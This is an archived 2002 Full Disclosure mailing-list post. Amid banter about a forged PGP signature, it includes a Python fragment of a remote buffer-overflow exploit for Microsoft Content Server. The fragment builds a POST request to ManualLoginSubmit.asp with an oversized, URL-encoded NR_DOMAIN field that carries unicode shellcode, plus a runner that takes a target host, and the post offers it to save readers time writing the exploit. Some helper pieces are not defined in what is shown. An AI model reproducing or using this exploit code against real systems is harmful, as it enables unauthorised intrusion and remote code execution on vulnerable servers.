Full Disclosure mailing list archives

ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p

From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Wed, 14 Aug 2002 14:24:51 -0700

At least you got the key id correct that time. It's not a valid
signature, but at least it produces one less error message.

-dave

ObExploit:

#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.

#returns the sploitstring
   def makesploit(self):
       header=""
       body=""

       body+="NR_DOMAIN=WinNT%3A%2F%2F"
       #1 alignment byte so we are word aligned with the return addr
       attack=""
       attack+="A"
       attack+="\x41\xb9"*4000
       #unicode shellcode!!
       attack=stroverwrite(attack,unicodeloop,1)
       print "length of overflow = "+str(len(attack))
       attack=urllib.quote(attack)
       #print attack

       body+=attack

body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS
WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest
Login.asp"



       header+="POST /NR/System/Access/ManualLoginSubmit.asp
HTTP/1.1\r\n"
       header+="Host: "+self.host+"\r\n"
       header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows
NT; Bob)\r\n"
       header+="Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q
=0.1\r\n"
       header+="Connection: keep-alive\r\n"
       header+="Content-Type: application/x-www-form-urlencoded\r\n"
       header+="Content-Length: "+str(len(body))+"\r\n"
       header+="\r\n"

       return header+body



#this stuff happens.
if __name__ == '__main__':

   print "Running Microsoft Content Server exploit v 0.1"
   app = mscsexploit()
   if len(sys.argv) < 2:
       print "Usage: mycontent.py target [port] [ssl=0]"
       sys.exit()

   app.setHost(sys.argv[1])
   if len(sys.argv) > 2:
       app.setPort(int(sys.argv[2]))

   if len(sys.argv) > 3:
       app.setSSL(1)

   app.run()


On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

or if you like

On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:

On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:

Gobbles,

On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:

GOBBLES just want to be cool whitehat like everyone else.  Time for

new

leaf time for six figure salary stock option naked breasted assistant.


Word to that my man! ;)

peace,
core


Your message was signed, but the "GOBBLES" message was not and therefore
just a forgery, most likely.

BTW:
http://www.immunitysec.com/vulnerabilities/
They arn't advisories, but if you need something to show to your boss
about why you disconnected your Exchange/SQL server from the Internet,
it's a good start.

Dave Aitel
Immunity, Inc


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/of

fers.cgi?id=domainpeople


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw
9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi
=9eW6
-----END PGP SIGNATURE-----


Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2

Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople

Current thread:

ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p, (continued)
- - - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Jonathan Rickman (Aug 14)
    - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Azerail (Aug 15)
    - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p ssinct (Aug 15)
    - SPIKE v2.5 Nicolas Couture (Aug 14)
    - RE: SPIKE v2.5 Nicolas Couture (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)
  - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)
  - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Dave Aitel (Aug 14)
  - ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Gary E. Miller (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)